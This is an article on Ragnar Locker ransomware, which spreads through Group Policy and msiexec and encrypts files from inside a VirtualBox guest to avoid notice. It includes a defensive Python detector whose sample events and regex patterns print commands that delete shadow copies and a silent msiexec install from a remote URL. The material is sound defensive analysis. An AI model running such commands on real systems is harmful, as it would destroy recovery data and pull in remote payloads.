Virtual machines have long been heralded as a tool for avoiding malware and ransomware infections. Many security-conscious IT pros, for example, do all of their casual Web browsing from within a virtual machine. The idea is that if a malware infection were to occur, then the virtual machine could easily be reset to a pristine state while the parent operating system remained completely isolated from the infection. Recently, however, ransomware authors have begun using virtual machines as an attack mechanism and Windows administration tools as a way to evade detection.
Perhaps the best example of this is an attack conducted by the Ragnar Locker Group, which has been involved in some high-profile extortion schemes in the past. One of the widely publicized examples was when the group attacked Energias de Portugal. In that particular attack, the group claimed to have stolen 10 TB of data and threatened to release the data to the public unless the company paid a ransom of 1,580 bitcoin (which was about 11 million U.S. dollars). More recently, business travel management company CWT Global B.V. paid a ransom demand following a ransomware attack that reportedly involved Ragnar Locker.
The Ragnar Locker Group is now using virtual machines as a tool for helping its ransomware to evade detection. The attack begins by compromising a Windows machine in an effort to gain administrative access. This is commonly done by exploiting an insecure, externally exposed RDP service. Once the group has gained administrative access, the next step in the attack is to modify a Group Policy Object.
Windows administrators commonly use Group Policy settings as a tool for pushing legitimate software applications to network endpoints. If you look at the figure below, for example, you can see that the Group Policy Management Editor provides a Software Installation option beneath the User Configuration \ Policies \ Software Installation node. Ragnar Locker exploits this particular Group Policy setting as a tool for distributing its ransomware. However, this process isn’t quite as simple as merely packaging malware and using Group Policy settings as a distribution tool. If that were all that was required, then the malicious software would almost certainly be detected by antivirus software.
One of the ways Ragnar Locker avoids detection is through the use of native Windows administration tools. Because these tools are a part of the Windows operating system, their use is unlikely to be flagged as malicious right away. While victims will no doubt eventually figure out that their networks have been compromised, the use of a native admin tool typically isn’t going to raise an immediate alarm the way the detection of malware would.
The Group Policy setting instructs Windows to run Microsoft Installer (MSIExec.exe). It passes parameters to the installer that cause it to silently download a malicious MSI package from the internet. This package includes, among other things, a copy of Oracle’s VirtualBox hypervisor and a lightweight virtual machine image. Some support scripts that are included in the MSI package disable various Windows security features and install VirtualBox along with the malicious virtual machine. They also delete volume shadow copies, thereby preventing the user from restoring previous (unencrypted) versions of the files without the aid of a dedicated backup application.
Once everything is in place, the virtual machine goes to work encrypting everything that it can. It attacks both local storage and network storage. It even goes so far as to terminate any applications that the user is currently working in so that the files become unlocked and can therefore be encrypted.
Because the ransomware is running within a virtual machine, its presence is likely to evade detection. The Windows operating system sees all of the encryption activity as being related to a virtual machine, rather than being able to see the malicious process that is running inside of the virtual machine. Sophos provides a detailed analysis of how the Ragnar Locker exploit works.
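The attack chain described above leaves process-creation evidence on the host even though the encryption itself happens inside the guest: msiexec.exe launched with a remote URL and a quiet switch, the shadow-copy deletion, and an unexpected hypervisor process. The following is an added example, not code from the original article or from Sophos, of detection logic run over constructed process-creation events of the kind a Sysmon Event ID 1 or Security 4688 record would yield after parsing. The host names, the URL, the allowlist of hosts where VirtualBox is approved, and the assumption that shadow copies are removed with vssadmin or wmic are all constructed for the example.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    """A parsed process-creation record (fields reduced to what the rules need)."""
    host: str
    parent_image: str
    image: str
    command_line: str


@dataclass(frozen=True)
class Finding:
    host: str
    rule: str
    severity: str
    command_line: str


# Assumed allowlist: hosts where VirtualBox is an approved application. A real
# deployment would take this from asset inventory rather than a literal.
VIRTUALBOX_APPROVED_HOSTS = {"dev-ws-07"}

_URL = re.compile(r"https?://", re.IGNORECASE)
# Windows Installer switches that suppress the UI (silent install).
_QUIET = re.compile(r"(^|\s)/(q|qn|qb|quiet|passive)\b", re.IGNORECASE)
# Common shadow-copy deletion commands (assumed; the article only says the
# support scripts delete volume shadow copies).
_SHADOW_DELETE = [
    re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.IGNORECASE),
    re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.IGNORECASE),
]
_VBOX_IMAGES = {"vboxheadless.exe", "virtualbox.exe", "vboxmanage.exe", "vboxsvc.exe"}


def _basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: ProcessEvent) -> list[Finding]:
    """Apply the three rules to a single event and return any findings."""
    findings = []
    image = _basename(event.image)
    cmd = event.command_line

    # Rule 1: msiexec fetching a package from a URL; silent switches raise severity.
    if image == "msiexec.exe" and _URL.search(cmd):
        severity = "high" if _QUIET.search(cmd) else "medium"
        findings.append(Finding(event.host, "msiexec_remote_package", severity, cmd))

    # Rule 2: volume shadow copy deletion, regardless of which binary issued it.
    if any(p.search(cmd) for p in _SHADOW_DELETE):
        findings.append(Finding(event.host, "shadow_copy_deletion", "high", cmd))

    # Rule 3: a VirtualBox process on a host where the hypervisor is not approved.
    if image in _VBOX_IMAGES and event.host not in VIRTUALBOX_APPROVED_HOSTS:
        findings.append(Finding(event.host, "unexpected_hypervisor", "medium", cmd))

    return findings


def scan(events) -> list[Finding]:
    """Run every event through the rules, preserving event order."""
    return [f for e in events for f in evaluate(e)]


# Constructed sample events (not real telemetry). 203.0.113.10 is a
# documentation address; the hosts and paths are invented.
SAMPLE_EVENTS = [
    ProcessEvent("fin-ws-12", r"C:\Windows\System32\svchost.exe",
                 r"C:\Windows\System32\msiexec.exe",
                 "msiexec.exe /i http://203.0.113.10/update.msi /q"),
    ProcessEvent("fin-ws-12", r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\vssadmin.exe",
                 "vssadmin.exe delete shadows /all /quiet"),
    ProcessEvent("fin-ws-12", r"C:\Windows\System32\cmd.exe",
                 r"C:\Program Files\Oracle\VirtualBox\VBoxHeadless.exe",
                 'VBoxHeadless.exe --startvm "micro"'),
    # Same hypervisor process on an approved developer workstation: no alert.
    ProcessEvent("dev-ws-07", r"C:\Windows\explorer.exe",
                 r"C:\Program Files\Oracle\VirtualBox\VBoxHeadless.exe",
                 'VBoxHeadless.exe --startvm "ubuntu-test"'),
    # Silent install from an internal share (no URL): legitimate deployment.
    ProcessEvent("fin-ws-12", r"C:\Windows\System32\svchost.exe",
                 r"C:\Windows\System32\msiexec.exe",
                 r"msiexec.exe /i \\sccm01\pkgs\7zip.msi /qn"),
    ProcessEvent("fin-ws-12", r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\wbem\WMIC.exe",
                 "wmic shadowcopy delete"),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"[{finding.severity}] {finding.host}: {finding.rule} -> {finding.command_line}")
```

Each rule on its own would be noisy (administrators do run msiexec silently and do occasionally prune shadow copies), which is why the findings carry the host: several distinct rules firing on the same host within a short window is the signal worth paging on, and the local-share msiexec event shows that a silent install by itself is not enough to alert.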
The good news is that the Ragnar Locker attacks are highly targeted. You aren’t going to fall victim to this attack by accidentally opening a malicious email attachment. After all, the attack can only succeed if the attacker is able to first establish administrative access to the target system.
Even so, I expect to see copycats perform similar but less targeted attacks in the future. Since so many people log into their PCs with administrative credentials, there is nothing stopping ransomware from exploiting a user’s existing credentials and performing a similar attack. As such, organizations should consider using AppLocker or a third-party tool to prevent the installation of unauthorized software.